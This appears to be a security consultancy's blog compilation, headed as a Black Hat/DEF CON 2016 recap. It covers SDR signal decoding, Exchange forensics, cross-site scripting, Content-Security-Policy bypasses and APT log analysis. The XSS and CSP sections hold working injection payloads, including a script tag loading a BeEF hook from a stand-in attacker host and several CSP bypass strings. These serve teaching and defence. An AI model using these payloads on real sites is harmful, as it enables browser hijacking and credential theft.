Black Hat USA 2016 / DEF CON 24

At the beginning of August, as every year, two of our security analysts attended the most renowned IT security conferences, Black Hat USA and DEF CON, to learn about the latest trends and research. This year's Black Hat, the 19th edition, took place at the Mandalay Bay Convention Center, while DEF CON 24 was held at Paris and Bally's in Las Vegas.


In the following, we are going to summarize a selection of the talks attended.


Software Defined Radio (SDR) and Decoding On-off Keying (OOK)

This post gives a quick introduction to software defined radio (SDR) basics and provides guidance on decoding a very simple form of digital modulation (on-off keying).

Device Wireless Specs

Wireless junk hacking is not too difficult. Usually, devices transceive in the 433MHz or 868MHz ISM radio bands. As licensing in these bands is somewhat lax, all devices operating in them must be capable of tolerating interference from other band users. Pretty much comparable to the Internet 🙂 The European Communications Office (ECO) maintains a list of frequency bands for European countries, including Switzerland. The list provides information on the allocated ranges and their specific purpose, e.g. 5000MHz to 5030MHz is reserved for the GALILEO global navigation satellite system (GNSS) project.

The US makes it even simpler to get up to speed with any junk's wireless configuration (frequency, modulation type and line coding). Every wireless device approved for the US market must carry an FCC ID. The online catalog provides access to the wireless specs of a device based on this ID (usually printed on the device's back or specification sticker).

Radio Observation

Alexandru Csete's gqrx software defined radio comes in handy as a spectrum analyzer when looking for exact frequencies. It is mainly based on the GNU Radio project and supports all well-known platforms (Ettus USRPs, BladeRF, HackRF, RTL chipsets et al.).

For the devices I have at hand (light switches, temperature and humidity sensors, car keys, M-Bus transmitters) it turned out that they all operate in the 433MHz and 868MHz bands and can easily be observed with gqrx.

[Figure: gqrx spectrum view of the light switch signal]

The spectrum analyzer (mouse tooltip) tells us that this specific light switch operates at 433.93 MHz. Interestingly enough, gqrx also supports other fun and geeky stuff such as listening to FM radio or eavesdropping on road work and building site radio conversations.

Signal Capturing

Well, signal capturing varies slightly depending on the device and library you use. The device I used for this tutorial is originally a DVB-T USB stick, but it comes with the relevant Realtek RTL2832 chipset and goes for a few bucks on most major reseller platforms. Check the supported hardware list on the GNU Radio site. Hat tip to the Defcon Switzerland folks who provided me with one for cheap.

The following lines give an idea on how to capture signals with the Realtek chipset family of devices.

bla@bli:~$ rtl_sdr -f 433850000 -s 1000000 -g 20 switch.cu8
 Found 1 device(s):
 0:  Realtek, RTL2838UHIDIR, SN: 00000001

Using device 0: Generic RTL2832U OEM
 Found Rafael Micro R820T tuner
 Exact sample rate is: 1000000.026491 Hz
 [R82XX] PLL not locked!
 Sampling at 1000000 S/s.
 Tuned to 433850000 Hz.
 Tuner gain set to 19.70 dB.
 Reading samples in async mode...
 ^CSignal caught, exiting!

User cancel, exiting...

Make sure not to capture at the exact determined frequency of the device but slightly above or below, as the internal synthesizer would otherwise interfere with and overlay the signal. Note that we chose to sample the signal at a rate of 1 million samples per second (1 Msps) and that the output I/Q data was stored in the cu8 format. Some tools create output as complex signed int (.cs8, HackRF), others as complex unsigned int (.cu8, RTL), and GNU Radio prefers the complex float format (.cfile). There is a GNU Radio Companion (GRC) template and Paul Brewer's rtlsdr-to-gqrx tool for conversion from .cu8 to .cfile, should one need to pivot between the file types.
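Should neither tool be at hand, the conversion itself is only a few lines of NumPy. The following is a minimal sketch, assuming the usual RTL-SDR layout of interleaved unsigned 8-bit I/Q samples; the file names are taken from the capture above:

import numpy as np

# Read interleaved unsigned 8-bit I/Q samples (.cu8) as written by rtl_sdr
raw = np.fromfile("switch.cu8", dtype=np.uint8)

# Shift to zero-centered floats in [-1, 1] and pair I and Q into complex samples
iq = (raw.astype(np.float32) - 127.5) / 127.5
samples = iq[0::2] + 1j * iq[1::2]

# complex64 on disk is exactly the .cfile format GNU Radio expects
samples.astype(np.complex64).tofile("switch.cfile")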

Alternatively, one could use gqrx to record or replay signals in cfile format (Menu bar => Tools => I/Q recorder, CTRL-I). Note: replay doesn't transmit your signal but displays your capture within gqrx.

Signal Inspection

I used inspectrum to inspect my capture files. Once loaded, the capture coloring needs some tweaking, but it usually gives good hints on simple modulations, codings (e.g. Manchester) and the signal's symbol rate.

[Figure: capture file loaded in inspectrum]

Usually, a slight zoom and some adjustment of the power max and min sliders make it easy to discover the on-off keying modulation used in the example. Set the correct sample rate and drag the grid over the signal in order to determine its symbol rate.

[Figure: inspectrum grid aligned with the symbols of the switch signal]

The symbol rate of the switch signal is 1631 Hz. Scrolling through the capture also reveals that the on and off signals of the switch differ in only a few locations, share the same bit header and are sent multiple times in sequence. Pressing the button once obviously results in three or more transmissions of the on or off signal.

Signal Decoding

The GRC is the tool of choice for simple digital signal processing. It provides a GUI of building blocks that allows for the quick design of processing flows. The following design serves as a quick and dirty approach to OOK demodulation.

[Figure: GRC flow graph for OOK demodulation]

The relevant variables for the decoding are the sample rate (samp_rate: 1 Msps) and the symbol rate (baud_rate: 1631 Hz) which must be set to the values determined before.

The file source points to the .cfile version of the previously captured signals and feeds the data into a throttle block to avoid infinite processing speed. The "Complex to Mag^2" and "Threshold" blocks convert the signal waveform into a rectangular pulse of ones and zeros. Note that the data type switches from complex (light blue) to float (orange) with the "Complex to Mag^2" block.

The "Keep 1 in N" block ensures that each bit is represented by a single data point. N is computed as samp_rate/baud_rate. Note that such a rough way of signal processing may not work with signals that slightly vary the baud rate or with long-lasting sequences. Even with short signals, one must expect small errors. The scope sink then displays the decoded binary values.
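For readers who prefer scripting over the GUI, the same flow can be sketched with GNU Radio's Python API. This is an approximation of the design above, not a drop-in tool: the threshold value is an assumption and must be tuned to the observed signal power, and a file sink replaces the GUI scope.

from gnuradio import gr, blocks

class OokDemod(gr.top_block):
    def __init__(self, samp_rate=1000000, baud_rate=1631):
        gr.top_block.__init__(self)
        src = blocks.file_source(gr.sizeof_gr_complex, "switch.cfile", False)
        throttle = blocks.throttle(gr.sizeof_gr_complex, samp_rate)
        mag2 = blocks.complex_to_mag_squared(1)       # "Complex to Mag^2"
        thresh = blocks.threshold_ff(0.01, 0.01, 0)   # tune to the signal power
        keep = blocks.keep_one_in_n(gr.sizeof_float,  # "Keep 1 in N"
                                    int(samp_rate / baud_rate))
        sink = blocks.file_sink(gr.sizeof_float, "bits.f32")
        self.connect(src, throttle, mag2, thresh, keep, sink)

OokDemod().run()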

[Figure: scope plot of the demodulated binary values]

Compare the scope plot to the previous inspectrum screenshot and you will notice that the demodulated signal indeed matches the figure in inspectrum.

Signal Analysis

GRC Visualization Support

None of the visual sinks in GRC provide easy means to visualize binary streams and to make the adjustments needed to spot patterns and variations between streams. Thus, I decided to come up with a custom out-of-tree module for binary visualization and inspection, in short BinViz.

The initial GRC project requires small adjustments to feed data into BinViz instead of the WX GUI Scope.

[Figure: GRC flow graph feeding BinViz]

The "Float to Char" block converts the float values into 0x00 and 0x01. Moreover, the "Unpacked to Packed" block squeezes eight chars into a single byte (e.g. 0x00 0x00 0x00 0x01 0x01 0x01 0x01 0x01 => 0x1F) and feeds this into BinViz.
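The packing itself is plain bit arithmetic; the following few lines replicate the example above (MSB first, matching the byte shown):

bits = [0, 0, 0, 1, 1, 1, 1, 1]   # eight unpacked chars from "Float to Char"
byte = 0
for bit in bits:
    byte = (byte << 1) | bit      # shift in one bit at a time, MSB first
print(hex(byte))                  # prints 0x1f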

BinViz Configuration

The start, end and drop pattern parameters allow adjusting how streams are displayed and aligned. These parameters take strings composed of 0s and 1s, e.g. 01010101 as a preamble or start pattern. The display will start a new line for each occurrence of the start pattern. On detection of the end pattern, the display wraps to a new line. In case both the start and the end pattern are defined, the display will drop any out-of-bounds bits and only display streams from start to end, on a single line each. Once the start pattern has been detected, additional occurrences of it are ignored until the end pattern is detected.

To get rid of long sequences of zero bytes or arbitrary unwanted bit sequences, set "skip zero bytes" to true or define a string of 0s and 1s as the drop pattern to be removed. Note that the drop pattern and "skip zero bytes" take precedence over the start and end detection patterns.

[Figure: BinViz display example]

The display itself allows for some semi-live adjustments and manual analysis. For example, the mouse wheel on the display allows zooming in and out while new bits are displayed instantly. Once the display is clicked, it stops painting new bits and shows a cursor and its x/y position. In that mode, one can easily count bits or select part of the bitstream for magnification and closer inspection.

Visual Signal Analysis

The earlier analysis using inspectrum already let us observe six occurrences of the on signal when switching on, and a further six occurrences of the off signal when switching off. For this type of wireless junk it is probably irrelevant how many times the receiver picks up the signal. As noted earlier, sending the signal multiple times is rather a matter of resilience towards other ISM band users: just to make sure it is picked up, sooner or later.

[Figure: BinViz showing the repeated on and off signal sequences]

BinViz was configured with "11010011" as the start and "1001001001001001001" as the end pattern. That way, only relevant data is displayed. Thanks to BinViz's capabilities, the six on and off signals are easily recognizable as single rows. Moreover, the differences between the on and off signals become immediately clear.

Looking forward to your contributions: https://github.com/CBrunsch/BinViz

Hands-on, IoT Security Training

If you need more hands-on experience with junk hacking or the analysis of IoT devices, you are very welcome to join us for our brand new practice-oriented training on "IoT Security", held in German at the Compass head office in Jona on September 20th/21st 2016. Sign up here.

Exchange Forensics

Introduction

The number one form of communication in corporate environments is email. In 2015 alone, the number of business emails sent and received per day was estimated at over 112 billion [1], and employees spend on average 13 hours per week in their email inbox [2]. Unfortunately, emails are at times also misused for illegitimate communication. Back when the concept of email was designed, security was not the main focus of its inventors, and some of the design shortcomings are still problematic today. The sender rarely uses encryption, and the receiver cannot check the integrity of unprotected emails. Not even the metadata in the header of an email can be trusted, as an attacker can easily forge this information. Even though many attempts have been made at securing email communication, there are still a lot of unsecured emails sent every day. This is one of the reasons why attackers still exploit weaknesses in email communication. In our experience, a lot of forensic investigations involve an attacker either stealing or leaking information via email, or an employee unintentionally opening malware received via email. Once this has happened, there is no way around a forensic investigation in order to answer key questions such as: who did what, when and how? Because many corporate environments use Microsoft Exchange as their mailing system, we cover some basics on what kind of forensic artifacts the Microsoft Exchange environment provides.

Microsoft Exchange Architecture

In order to understand the different artifacts, we first take a look at the basic Microsoft Exchange architecture and the components involved. The diagram below shows the architectural concepts of the on-premises version of Exchange 2016. Edge Transport servers build the perimeter of the email infrastructure. They handle external email flow and apply antispam and email flow rules. Database availability groups (DAGs) form the heart of Microsoft's Exchange environment. They contain a group of Mailbox servers and host a set of databases. The Mailbox servers contain the transport services that are used to route emails. They also contain the client access service, which is responsible for routing or proxying connections to the corresponding backend services on a Mailbox server. Clients don't connect directly to the backend services. When a client sends an email through the Microsoft Exchange infrastructure, it always traverses at least one Mailbox server.

[Figure: Exchange 2016 Architecture [3]]

Compliance Features

Microsoft Exchange provides multiple compliance features. Each of them provides a different set of information to an investigator, and it is important to have a basic understanding of their behavior in order to know which feature can provide an answer to which question. The most important compliance features are covered in the following paragraphs.

Message Tracking

The message tracking compliance feature writes a record of all activity into a log file as emails flow through Mailbox servers and Edge Transport servers. These logs contain details regarding the sender, recipient, message subject, date and time. By default, message tracking logs are kept for a maximum of 30 days, provided the log files do not grow beyond 1000MB.

The following example shows the message tracking log entries created when the user “alice@csnc.ch” sends a message with the MessageSubject “Meeting” to the user “bob@csnc.ch“. Note that in this example both users have their mailboxes on the same server.

EventId    Source      Sender        Recipients    MessageSubject
-------    ------      ------        ----------    --------------
NOTIFYMAPI STOREDRIVER               {}
RECEIVE    STOREDRIVER alice@csnc.ch {bob@csnc.ch} Meeting
SUBMIT     STOREDRIVER alice@csnc.ch {bob@csnc.ch} Meeting
HAREDIRECT SMTP        alice@csnc.ch {bob@csnc.ch} Meeting
RECEIVE    SMTP        alice@csnc.ch {bob@csnc.ch} Meeting
AGENTINFO  AGENT       alice@csnc.ch {bob@csnc.ch} Meeting
SEND       SMTP        alice@csnc.ch {bob@csnc.ch} Meeting
DELIVER    STOREDRIVER alice@csnc.ch {bob@csnc.ch} Meeting

The message content is not stored as part of the message tracking logs. By default, the subject line of an email message is stored in the tracking logs; however, this can be disabled in the configuration settings. [4]
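During an investigation, copied message tracking logs can of course also be processed offline. The following is a rough sketch that greps such a log for a sender with plain Python; the file name is hypothetical and the exact field names depend on the Exchange version, so both are assumptions to adapt:

import csv

# Hypothetical name of a copied message tracking log file
LOG = "MSGTRK2016080112-1.LOG"

fields = None
with open(LOG, newline="", encoding="utf-8-sig") as f:
    for row in csv.reader(f):
        if row and row[0].startswith("#Fields:"):
            # Header line, e.g. "#Fields: date-time,client-ip,...,sender-address,..."
            fields = [row[0].split(" ", 1)[1]] + row[1:]
        elif fields and row and not row[0].startswith("#"):
            rec = dict(zip(fields, row))
            if rec.get("sender-address", "").lower() == "alice@csnc.ch":
                print(rec.get("date-time"), rec.get("event-id"), rec.get("message-subject"))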

Single Item Recovery

Single Item Recovery is a compliance feature that essentially allows you to recover individual emails without having to restore them from a full database backup. If a user deletes an email in Outlook, it goes to the “Deleted Items” folder. When the user deletes this email from the “Deleted Items” folder, the email will be placed into the “Dumpster” (soft delete). The following screenshots show how the “Dumpster” can be accessed:

[Figure: Recover deleted items in Outlook [5]]

When clicking on the “Recover Deleted Items” trash symbol, the “Dumpster” gets opened as shown on the following screenshot:

[Figure: the opened "Dumpster" in Outlook [5]]

From the "Dumpster", messages can either be recovered or purged completely (hard delete). Purged messages can of course still be recovered if a backup of the mailbox is available. When Single Item Recovery is enabled, emails remain recoverable for administrators even if the mailbox owner deletes the messages from the inbox, empties the "Deleted Items" folder and then purges the content of the "Dumpster". Single Item Recovery is not enabled by default and has to be enabled before the events under investigation occur. In order to recover a message, the following information is needed [6]:

  • The source mailbox that needs to be searched.
  • The target mailbox into which the emails will be recovered.
  • Search criteria such as sender, recipient or keywords in the message.

With the information above, an email can be found using the Exchange Management Shell (EMS) as shown in the following example.

Search-Mailbox "Alice" -SearchQuery "from:Bob" -TargetMailbox "Investigation Search Mailbox" -TargetFolder "Alice Recovery" -LogLevel Full

In-Place Hold

In-Place Hold can be used to preserve mailbox items. If this compliance feature is enabled, an email is kept even if it was purged by a user (deleted from the "Dumpster"). Also, if an item is modified, a copy of the original version is retained. In-Place Hold is usually activated during investigations in order to preserve the mailbox content of an individual. The individuals concerned do not notice that they are "on hold". A query with parameters can be used to granularly define the scope of items to hold. By default, In-Place Hold is disabled, and if neither Single Item Recovery nor In-Place Hold is enabled, an email is permanently deleted once a user purges it from the "Dumpster".

Mailbox Auditing

Mailboxes can contain sensitive information, including personally identifiable information (PII). Therefore, it is important to track who logged on to a mailbox and which actions were taken. It is especially important to track access to mailboxes by users other than the mailbox owner, the so-called delegates.

By default, mailbox auditing is disabled, and when enabled it requires more space in the corresponding mailbox. If enabled, one can specify which user actions (for example, accessing, moving or deleting a message) are logged per logon type (administrator, delegate user or owner). Audit log entries also include further important information such as the client IP address, host name and processes or clients used to access the mailbox. If the auditing policy is configured to only include key records such as sending or deleting items, there is no noticeable impact in terms of storage and performance.

Administrator Auditing

This compliance feature is used to log changes that an administrator makes to the Exchange server configuration. By default, this logging is enabled and the entries are kept for 90 days. Changes to the administrator auditing configuration itself are always logged. The log entries are stored in a hidden, dedicated mailbox which cannot be opened in Outlook or OWA.

Others

Exchange email flow rules, also known as transport rules, can be used to look for specific conditions in messages that pass through an Exchange server. These rules are similar to the inbox rules a lot of email clients offer. The main difference between an email flow rule and a rule set up in an email client is that email flow rules act on messages while they are in transit, as opposed to after the message is delivered. Furthermore, email flow rules have a richer set of conditions, exceptions and actions, which provides the flexibility to implement many types of messaging policies. [7]

Journaling allows recording a copy of all email communications and sending it to a dedicated mailbox on an Exchange server. Archiving, on the other hand, can be used to back up data, removing it from its native environment and storing a copy on another system. Finally, there is always the option of a full backup of an Exchange database. This creates and stores a complete copy of the database file as well as the transaction logs.

Summary

As we have seen, Microsoft Exchange provides various compliance features that help during forensic investigations involving email analysis. Having an understanding of which artifacts are available is key. The following table summarises the compliance features discussed in this post:

[Table: summary of the discussed compliance features]

Courses and Beer-Talk Reference

In order to directly share our experience in this field, we chose "Exchange Forensics" as the topic for our upcoming beer talks. Don't hesitate to sign up if you are interested. For more information, click on the link next to the location you would like to attend.

If you would like to dive even deeper, we provide the Security Training: Forensic Investigations. It covers:

  • Introduction to forensic investigations
  • Chain of custody
  • Imaging
  • Basics of file systems
  • Traces in slack space
  • Traces in office documents
  • Analysis of Windows systems
  • Analysis of network dumps
  • Analysis of OSX systems
  • Analysis of mobile devices
  • Forensic readiness
  • Log analysis

If you are interested please visit our “Security Trainings” section to get more information: https://www.compass-security.com/services/security-trainings/kursinhalte-forensik-investigation/ or get in touch if you have questions.

Sources and References:

[0] E-mail Forensics in a Corporate Exchange Environment, Nuno Mota, http://www.msexchange.org/articles-tutorials/exchange-server-2013/compliance-policies-archiving/e-mail-forensics-corporate-exchange-environment-part1.html

[1] Email-Statistics-Report-2015-2019, The Radicati Group, Inc., http://www.radicati.com/wp/wp-content/uploads/2015/02/Email-Statistics-Report-2015-2019-Executive-Summary.pdf

[2] the-social-economy, McKinsey & Company, http://www.mckinsey.com/industries/high-tech/our-insights/the-social-economy

[3] Exchange 2016 Architecture, Microsoft, https://technet.microsoft.com/de-ch/library/jj150491(v=exchg.160).aspx

[4]  Message Tracking, Microsoft, https://technet.microsoft.com/en-us/library/bb124375(v=exchg.160).aspx

[5] Recover deleted items in Outlook, Microsoft, https://support.office.com/en-us/article/Recover-deleted-items-in-Outlook-2010-cd9dfe12-8e8c-4a21-bbbf-4bd103a3f1fe

[6] Recover deleted messages in a user’s mailbox, Microsoft, https://technet.microsoft.com/en-us/library/ff660637(v=exchg.160).aspx

[7] Mail flow or transport rules Microsoft, https://technet.microsoft.com/en-us/library/jj919238(v=exchg.150).aspx

Cross-Site Scripting

Cross-Site Scripting is harmless? Think again!

Cross-Site Scripting, oftentimes referred to as "XSS", is a common vulnerability of web applications. The term refers to the incorrect behavior of a web application that insufficiently encodes user-provided data when displaying it back to the user. If this is the case, attackers are able to inject malicious code, for instance JavaScript, into the affected website.

[Figure: XSS popup]

One of our main tasks at Compass Security is testing web applications for security issues. Thus, we can safely say that many current web applications are affected by this type of vulnerability, even though protecting against it is simple. For simplicity's sake, XSS is usually demonstrated as a popup window displaying simple text.

Such a popup would be induced by the following code:

<script>alert(0)</script>

The entire attack would look as follows, given that the parameter param is vulnerable. Assume that the following code is used by a web application without employing output encoding:

<input type="text" name="param" value="user_input">

Here, user_input is the non-output encoded data provided by the user.

Then, an attacker can exploit this by setting param to

"><script>alert(0)</script><!--

which will lead to the following being sent to the user:

<input type="text" name="param" value=""><script>alert(0)</script><!--">

resulting in the above popup being displayed.

When discussing XSS with customers, one of the more common statements we hear is: "this issue is harmless; it only displays text in a popup window". This is not true, however, since XSS is far more powerful than often suspected. It allows an attacker to take full control over the victim's browser, the victim being the user who visits the attacked website. Common attack vectors include stealing the victim's session cookie, if it is not protected by the so-called HttpOnly flag. Further, the affected website can be manipulated so that the user is redirected to a phishing website, allowing the attacker to obtain the user's credentials. Finally, if the victim's browser is outdated and contains known vulnerabilities, these can be exploited directly via Cross-Site Scripting and, if successful, lead to the victim's computer being compromised.

[Figure: BeEF logo]

Many of the above-mentioned attack vectors can easily be tested using BeEF, the Browser Exploitation Framework (http://beefproject.com/). This framework provides many attack vectors that can be used by including just one malicious JavaScript file in the vulnerable website. Hence, instead of the above code ("><script>alert(0)</script><!--), the following would be injected:

"><script src=http://attacker.com/hook.js></script><!--

where attacker.com is an attacker-controlled website and hook.js is the malicious JavaScript file that will allow the BeEF server on the attacker’s machine to take control over the victim’s browser.

Once the victim’s browser executes the injected JavaScript, it is “hooked”, that is, in the attacker’s control, allowing them to obtain all kinds of information such as the user’s cookies, browser type and version, etc.:

[Figure: BeEF control panel showing the hooked browser]

Among many different types of attack vectors, BeEF allows, e.g., displaying a password prompt to the user (in the user’s browser):

[Figure: password prompt displayed via BeEF]

Once the user has entered their password, it is sent to the attacker:

[Figure: the captured password as seen by the attacker in BeEF]

How to protect against such attacks?

Simple! Just encode user-provided data before echoing it back to the user. An effective method is to use HTML entities:
" is encoded as &quot;,
< is encoded as &lt;,
and so forth (for a detailed explanation, refer to https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet).
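In Python, for example, the standard library already ships such an encoder. A quick illustration using the payload from above:

import html

user_input = '"><script>alert(0)</script><!--'
print(html.escape(user_input, quote=True))
# Output: &quot;&gt;&lt;script&gt;alert(0)&lt;/script&gt;&lt;!--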

If you want to see this and many more typical web application vulnerabilities, try them out yourself, and learn how to defend against them, register for our next Web Application Security course:

https://www.compass-security.com/services/security-trainings/

The Web Application Security (Basic/Advanced) courses will introduce all major web application attack vectors via theory and hands-on challenges in our Hacking-Lab:

https://www.hacking-lab.com/

Content-Security-Policy: misconfigurations and bypasses

Introduction

The Content Security Policy (CSP) is a security mechanism web applications can use to reduce the risk of attacks based on XSS, code injection or clickjacking. Using different directives, it is possible to lock down web applications by implementing a whitelist of trusted sources from which web resources like JavaScript may be loaded. Currently, CSP version 2 is supported by Firefox, Google Chrome and Opera, whereas other browsers provide limited support or no support at all (Internet Explorer) [4].

The CSP has two modes of operation [7]: enforcing and report-only. The first one can be used to block and report attacks whereas the second one is used only to report abuses to a specific reporting server. In this blog post, we will focus only on the enforcing mode.

The policy, in order to work, has to be included in each HTTP response as a header (“Content-Security-Policy:”). The browser will then parse the CSP and check if every object loaded in the page adheres to the given policy. To specify these rules, the CSP provides different directives [5]:

  • script-src: defines valid sources of JavaScript
  • object-src: defines valid sources of plugins, like <object> elements
  • img-src: defines valid sources of images
  • style-src: defines valid source of stylesheets
  • report-uri: the browser will POST a report to this URI in case of policy violation

Each of these directives must have a value assigned, which is usually a list of websites that resources may be loaded from. If a directive is omitted, the default behavior is to allow everything ("*") without restrictions [9]. A basic example of a valid CSP is shown below:

Content-Security-Policy: default-src 'self'; script-src compass-security.com

The directive "default-src" is set to 'self', which means same origin. All resources without an explicit directive may only be loaded from the same origin, in this case "blog.compass-security.com". Setting the "default-src" directive can be a good start for deploying your CSP, as it provides a basic level of protection. "script-src" is used to allow all JavaScript to be loaded from the domain "compass-security.com", via HTTP (https:// should be explicitly specified) and without allowing subdomains. Subdomains could be specified directly (e.g. sub.compass-security.com) or using the "*" wildcard (*.compass-security.com).
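Since the policy has to be delivered with every HTTP response, it is typically set centrally in the web server or application. A minimal sketch with Flask is shown below; the framework choice is an assumption, and any other framework provides an equivalent hook:

from flask import Flask

app = Flask(__name__)

@app.after_request
def set_csp(response):
    # Mirror of the example policy above; adjust the sources to your application
    response.headers["Content-Security-Policy"] = (
        "default-src 'self'; script-src compass-security.com"
    )
    return response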

Misconfigurations and Bypasses

Even though it is possible to have a good level of control over the policy, errors in the definition of directives may lead to unexpected consequences. Misconfigurations or ambiguities can render the policy less effective or easy to bypass. In addition, the functionality of the application could be broken. The following example illustrates what can happen if "default-src" is omitted:

Content-Security-Policy: script-src compass-security.com

Now, all scripts with source "compass-security.com" are allowed. But what about other objects like stylesheets or Flash applets? The policy above can be bypassed, for example, using the following payload, which triggers an alert box using a Flash object [7]:

">'><object type="application/x-shockwave-flash" 
data='https://ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/
assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>

Another common mistake is the inclusion of the dangerous "unsafe-inline" or "unsafe-eval" keywords. These allow the execution of potentially malicious JavaScript directly via "<script>" tags or eval():

Content-Security-Policy: default-src 'self'; script-src compass-security.com 'unsafe-inline';

This policy defines the default source as 'self' and allows the execution of scripts from "compass-security.com", but at the same time it allows the execution of inline scripts. This means that the policy can be bypassed with the following payload [7]:

">'><script>alert(1337)</script>

The browser will then parse the JavaScript and execute the injected malicious content.

Besides the trivial misconfigurations shown above, there are other, less commonly known tricks used to bypass the CSP. These make use, for example, of JSONP (JSON with padding) or open redirects. Let's take a look at JSONP bypasses first.

If the CSP whitelists a JSONP endpoint, it is possible to take advantage of the callback parameter to bypass the CSP. Assume that the policy is defined as follows:

Content-Security-Policy: script-src 'self' https://compass-security.com;

The domain compass-security.com hosts a JSONP endpoint, which can be called with the following URL:

https://compass-security.com/jsonp?callback={functionName}

Now, what happens if the {functionName} parameter contains valid JavaScript code which could potentially be executed? The following payload represents a valid bypass [7]:

">'><script src="https://compass-security.com/jsonp?callback=alert(1);u">

The JSONP endpoint will then parse the callback parameter, generating the following response:

alert(1);u({...})

The JavaScript before the semicolon, alert(1), will be executed by the client when processing the response received.

URLs with open redirects could also pose problems if whitelisted in the CSP. Imagine the policy is set to be very restrictive, allowing only one specific file and domain in its "script-src" directive:

Content-Security-Policy: default-src 'self'; script-src https://compass-security.com/myfile.js https://redirect.compass-security.com

At first sight, this policy seems very restrictive: only myfile.js can be loaded, along with all scripts originating from "redirect.compass-security.com", which is a site we trust. However, redirect.compass-security.com performs open redirects through a parameter in the URL. This makes it possible to bypass the policy [7]:

">'><script src="https://redirect.compass-security.com/redirect?url=https%3A//evilwebsite.com/jsonp%2Fcallback%3Dalert">

Why is it possible to bypass the CSP using this payload? The CSP does not check the landing page after a redirect occurs, and as the source of the script tag, "https://redirect.compass-security.com", is whitelisted, no policy violation is triggered.

These are only a small subset of the possible CSP bypasses. If you are interested, many more can be found at [6] or [7].

The “nonce” directive

Besides the whitelist mechanism using URLs, in the CSP2 there are other techniques that can be used to block code injection attacks. One of these is represented for example by “nonces”.

Nonces are randomly generated values that are declared in the CSP and included only inside <script> or <style> tags to identify resources and provide a mapping between the policy and the client's browser. An attacker injecting a payload containing a script tag has no knowledge of the nonce previously exchanged between the client and the server, so the CSP detects the injection and reports a policy violation. A possible configuration of a CSP with nonces could be:

Content-Security-Policy: script-src 'nonce-eED8tYJI79FHlBgg12'

The value of the nonce (which should be random, unpredictable, generated with every response, and at least 128 bits long [10]) is “eED8tYJI79FHlBgg12”.

This value should then be passed to each script tag included in our application's pages:

<script src="http://source/script.js" nonce="eED8tYJI79FHlBgg12">

The browser will then parse the CSP, check whether the included scripts carry a matching nonce value and block those that do not include a valid nonce. This technique works great against stored XSS, as the attacker cannot include valid nonces at injection time. Another advantage is that there is no need to maintain whitelists of allowed URLs, as the nonce acts as an access token for the <script> tag and not necessarily for the source of the script. It is also possible to use hashes in order to identify the content of each <script> element inside the page; more information about this feature can be found at [8].
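Generating such a nonce is straightforward; what matters is that it is cryptographically random and regenerated for every response. A small sketch in Python:

import secrets

# 16 random bytes = 128 bits of entropy, in line with the recommendation in [10]
nonce = secrets.token_urlsafe(16)

header = "Content-Security-Policy: script-src 'nonce-{}'".format(nonce)
script_tag = '<script src="http://source/script.js" nonce="{}"></script>'.format(nonce)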

Conclusion

We have seen that the CSP is a very useful tool web developers can use to gain better control over the resources loaded by their pages. The different directives provide the flexibility to allow or deny potentially dangerous web resources inside web pages. However, it is also easy to make errors if too many URLs are whitelisted (e.g. hidden JSONP endpoints). Here at Compass we encourage the use of the CSP as an additional barrier against web threats. Nonetheless, I would like to stress that the first line of defense against code injection should always be solid input/output validation, which also helps against other common attacks like SQL injection.

If you would like to get more information about how web applications should be protected, or if you want to deepen your web security knowledge, we provide different trainings.

We also offer trainings in other areas of IT security. You can check the different topics in the "Security Trainings" section of our website.

Sources & References

  1. https://www.owasp.org/index.php/Content_Security_Policy
  2. https://www.w3.org/TR/CSP2/#intro
  3. https://w3c.github.io/webappsec-csp/#match-element-to-source-list
  4. http://caniuse.com/#search=Content%20Security%20Policy%20Level%202
  5. http://content-security-policy.com/
  6. https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it’s-CSP!%22.
  7. http://conference.hitb.org/hitbsecconf2016ams/materials/D1T2%20-%20Michele%20Spagnuolo%20and%20Lukas%20Weichselbaum%20-%20CSP%20Oddities.pdf
  8. https://blog.mozilla.org/security/2014/10/04/csp-for-the-web-we-have/
  9. http://www.html5rocks.com/en/tutorials/security/content-security-policy/
  10. https://www.w3.org/TR/CSP/#source_list

APT Detection & Network Analysis

Until recently, the majority of organizations believed that they did not have to worry about targeted attacks because they considered themselves to be "flying under the radar". The common belief has been: "We are too small; only big organizations like financial service providers, the military industry, energy suppliers and government institutions are affected".

However, this assumption has been proven wrong at least since the detection of Operation Shady RAT [0], DarkHotel [1] or the recent RUAG cyber espionage case [2]. The analysis of the Command & Control (C&C) servers of Shady RAT revealed that a large-scale operation had been running from 2006 to 2011. During this operation, 71 organizations (private and public) were targeted and spied on. It is assumed that these so-called Advanced Persistent Threats (APTs) will only increase in the near future.

We at Compass Security are often asked to help find malicious actions or traffic inside corporate networks.

The infection is, in most cases, a mix of social engineering methods (for example spear phishing) and the exploitation of vulnerabilities; the details vary from case to case. In proxy logs we often observe that employees were lured into visiting phishing sites designed to look exactly like the corporation's Outlook Web Access (OWA) or similar applications/services used by the targeted company.

Typically, this is not something you can prevent with technical measures alone; user awareness is the key here! Nevertheless, we are often called in to investigate when there is still malware activity in the network. APT traffic can then be detected by correlating DNS, mail, proxy and firewall logs.

Network Analysis & APT Detection

To analyze a network, Compass analysts first have to know the network's topology to get an idea of how malware (or a human attacker) might communicate with external servers. Almost every attacker is going to exfiltrate data at some point in time; this is the nature of corporate/industrial espionage. Further, it is important to find out whether the attacker gained access to other clients or servers in the network.

For the analysis, log files are crucial. Many companies already collect logs on central servers [3], which speeds up the investigation process, since administrators don't have to gather the logs from many different sources (which sometimes takes weeks), and off-site logs are more difficult for attackers to clear.

To analyze logs and sometimes traffic dumps, we use different tools such as Splunk, the ELK stack (Elasticsearch, Logstash, Kibana) and Moloch.

ELK offers many advantages when it comes to clustering and configuration, but it doesn't offer many pre-configured log parser rules. If you are lucky, you can find some for your infrastructure on GrokBase [4]. Otherwise, there are plenty of tools helping you build your own, such as the Grok Debugger [5].

However, when the analysis has to be kick-started fast and you do not have time to configure large rulesets, Splunk comes with a wide range of pre-configured parsers.

After we gathered all logs (and in some cases traffic dumps), we feed them into Splunk/ELK/Moloch for indexing.

